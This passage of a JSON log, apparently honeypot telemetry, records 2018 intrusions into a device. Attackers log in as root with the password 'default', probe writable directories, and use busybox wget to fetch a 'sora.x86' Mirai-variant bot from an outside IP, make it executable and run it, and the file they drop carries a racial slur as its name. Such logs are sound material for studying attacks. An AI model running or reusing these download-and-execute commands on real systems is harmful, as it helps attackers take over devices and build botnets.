2568. },
2569. {
2570. "@timestamp": "2018-09-15T04:15:33.925Z",
2571. "eventid": "command.input",
2572. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
2573. },
2574. {
2575. "@timestamp": "2018-09-15T04:15:33.924Z",
2576. "eventid": "command.input",
2577. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
2578. },
2579. {
2580. "@timestamp": "2018-09-15T04:15:33.916Z",
2581. "eventid": "command.input",
2582. "input": "sh"
2583. },
2584. {
2585. "@timestamp": "2018-09-15T04:15:33.914Z",
2586. "eventid": "command.input",
2587. "input": "shell"
2588. },
2589. {
2590. "@timestamp": "2018-09-15T04:15:33.912Z",
2591. "eventid": "command.input",
2592. "input": "system"
2593. },
2594. {
2595. "@timestamp": "2018-09-15T04:15:33.824Z",
2596. "eventid": "command.input",
2597. "input": "enable"
2598. },
2599. {
2600. "@timestamp": "2018-09-15T04:15:33.647Z",
2601. "eventid": "command.input",
2602. "input": ""
2603. },
2604. {
2605. "@timestamp": "2018-09-15T04:15:32.860Z",
2606. "eventid": "login.success",
2607. "geoip": {
2608. "city_name": "Las Vegas",
2609. "country_name": "United States"
2610. },
2611. "password": "default",
2612. "username": "root"
2613. }
2614. ],
2615. "faec9c00af69": [
2616. {
2617. "@timestamp": "2018-09-15T04:13:35.489Z",
2618. "eventid": "command.input",
2619. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
2620. },
2621. {
2622. "@timestamp": "2018-09-15T04:13:35.354Z",
2623. "eventid": "command.input",
2624. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
2625. },
2626. {
2627. "@timestamp": "2018-09-15T04:13:34.834Z",
2628. "eventid": "command.input",
2629. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2630. },
2631. {
2632. "@timestamp": "2018-09-15T04:13:34.699Z",
2633. "eventid": "command.input",
2634. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
2635. },
2636. {
2637. "@timestamp": "2018-09-15T04:13:34.571Z",
2638. "eventid": "command.input",
2639. "input": "/bin/busybox SORA"
2640. },
2641. {
2642. "@timestamp": "2018-09-15T04:13:34.435Z",
2643. "eventid": "command.input",
2644. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
2645. },
2646. {
2647. "@timestamp": "2018-09-15T04:13:34.303Z",
2648. "eventid": "command.input",
2649. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
2650. },
2651. {
2652. "@timestamp": "2018-09-15T04:13:34.294Z",
2653. "eventid": "command.input",
2654. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
2655. },
2656. {
2657. "@timestamp": "2018-09-15T04:13:34.286Z",
2658. "eventid": "command.input",
2659. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
2660. },
2661. {
2662. "@timestamp": "2018-09-15T04:13:34.285Z",
2663. "eventid": "command.input",
2664. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
2665. },
2666. {
2667. "@timestamp": "2018-09-15T04:13:34.277Z",
2668. "eventid": "command.input",
2669. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
2670. },
2671. {
2672. "@timestamp": "2018-09-15T04:13:34.275Z",
2673. "eventid": "command.input",
2674. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
2675. },
2676. {
2677. "@timestamp": "2018-09-15T04:13:34.267Z",
2678. "eventid": "command.input",
2679. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
2680. },
2681. {
2682. "@timestamp": "2018-09-15T04:13:34.265Z",
2683. "eventid": "command.input",
2684. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
2685. },
2686. {
2687. "@timestamp": "2018-09-15T04:13:34.257Z",
2688. "eventid": "command.input",
2689. "input": "\u003e/.ptmx \u0026\u0026 cd /"
2690. },
2691. {
2692. "@timestamp": "2018-09-15T04:13:34.256Z",
2693. "eventid": "command.input",
2694. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
2695. },
2696. {
2697. "@timestamp": "2018-09-15T04:13:34.254Z",
2698. "eventid": "command.input",
2699. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
2700. },
2701. {
2702. "@timestamp": "2018-09-15T04:13:34.246Z",
2703. "eventid": "command.input",
2704. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
2705. },
2706. {
2707. "@timestamp": "2018-09-15T04:13:34.243Z",
2708. "eventid": "command.input",
2709. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
2710. },
2711. {
2712. "@timestamp": "2018-09-15T04:13:34.236Z",
2713. "eventid": "command.input",
2714. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
2715. },
2716. {
2717. "@timestamp": "2018-09-15T04:13:34.234Z",
2718. "eventid": "command.input",
2719. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
2720. },
2721. {
2722. "@timestamp": "2018-09-15T04:13:34.227Z",
2723. "eventid": "command.input",
2724. "input": "sh"
2725. },
2726. {
2727. "@timestamp": "2018-09-15T04:13:34.225Z",
2728. "eventid": "command.input",
2729. "input": "shell"
2730. },
2731. {
2732. "@timestamp": "2018-09-15T04:13:34.223Z",
2733. "eventid": "command.input",
2734. "input": "system"
2735. },
2736. {
2737. "@timestamp": "2018-09-15T04:13:34.101Z",
2738. "eventid": "command.input",
2739. "input": "enable"
2740. },
2741. {
2742. "@timestamp": "2018-09-15T04:13:33.974Z",
2743. "eventid": "command.input",
2744. "input": ""
2745. },
2746. {
2747. "@timestamp": "2018-09-15T04:13:32.470Z",
2748. "eventid": "login.success",
2749. "geoip": {
2750. "city_name": "Las Vegas",
2751. "country_name": "United States"
2752. },
2753. "password": "default",
2754. "username": "root"
2755. }
2756. ]
2757. }
2758. }